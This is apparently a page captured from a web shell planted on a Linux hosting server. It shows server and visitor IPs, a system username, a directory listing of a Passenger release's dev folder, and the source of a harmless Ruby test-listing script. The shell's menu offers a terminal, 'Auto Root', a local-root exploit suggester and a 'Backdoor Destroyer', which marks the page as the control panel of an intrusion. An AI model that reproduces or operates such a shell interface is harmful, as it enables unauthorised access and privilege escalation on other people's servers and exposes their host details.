Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.60
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby27 /
src /
passenger-release-6.1.2 /
dev /
Delete
Unzip
Name
Size
Permission
Date
Action
boost-patches
[ DIR ]
drwxr-xr-x
2026-05-26 22:42
ci
[ DIR ]
drwxr-xr-x
2026-05-26 22:42
configkit-schemas
[ DIR ]
drwxr-xr-x
2026-05-26 22:42
rack.test
[ DIR ]
drwxr-xr-x
2026-05-26 22:42
vagrant
[ DIR ]
drwxr-xr-x
2026-05-26 22:42
colorize-logs
7.29
KB
-rwxr-xr-x
2026-01-28 03:20
copy_boost_headers
9.55
KB
-rwxr-xr-x
2026-01-28 03:20
index_cxx_dependencies.rb
3.94
KB
-rwxr-xr-x
2026-01-28 03:20
install_scripts_bootstrap_code.rb
1.31
KB
-rwxr-xr-x
2026-01-28 03:20
list_tests
981
B
-rwxr-xr-x
2026-01-28 03:20
nginx_version_sha256
2.5
KB
-rwxr-xr-x
2026-01-28 03:20
parse_file_descriptor_log
2.54
KB
-rwxr-xr-x
2026-01-28 03:20
ruby_server.rb
6.17
KB
-rwxr-xr-x
2026-01-28 03:20
runner
623
B
-rwxr-xr-x
2026-01-28 03:20
show-latest-crashlog-dir
784
B
-rwxr-xr-x
2026-01-28 03:20
Save
Rename
#!/usr/bin/env ruby # # Usage: ./dev/list_tests.rb <FILENAME> # # Lists the test names in the given .cpp test file. require_relative '../src/ruby_supportlib/phusion_passenger/utils/ansi_colors' include PhusionPassenger::Utils::AnsiColors def extract_category_name(occurrence) occurrence =~ / (.+) / return $1 end def extract_test_name(occurrence) occurrence = occurrence.sub(/.*?\((.+)\).*/m, '\1') occurrence.gsub!(/"\n[ \t]*"/m, '') occurrence.sub!(/\A"/, '') occurrence.sub!(/"\Z/, '') return occurrence end def start(filename) STDOUT.write(DEFAULT_TERMINAL_COLOR) begin occurrences = File.read(filename).scan(%r{/\*\*\*\*\* .+? \*\*\*\*\*/|set_test_name\(.+?\);}m) occurrences.each do |occurrence| if occurrence =~ %r{\A/} puts ansi_colorize("<b>" + extract_category_name(occurrence) + "</b>") else puts " " + extract_test_name(occurrence) end end ensure STDOUT.write(RESET) end end start(ARGV[0])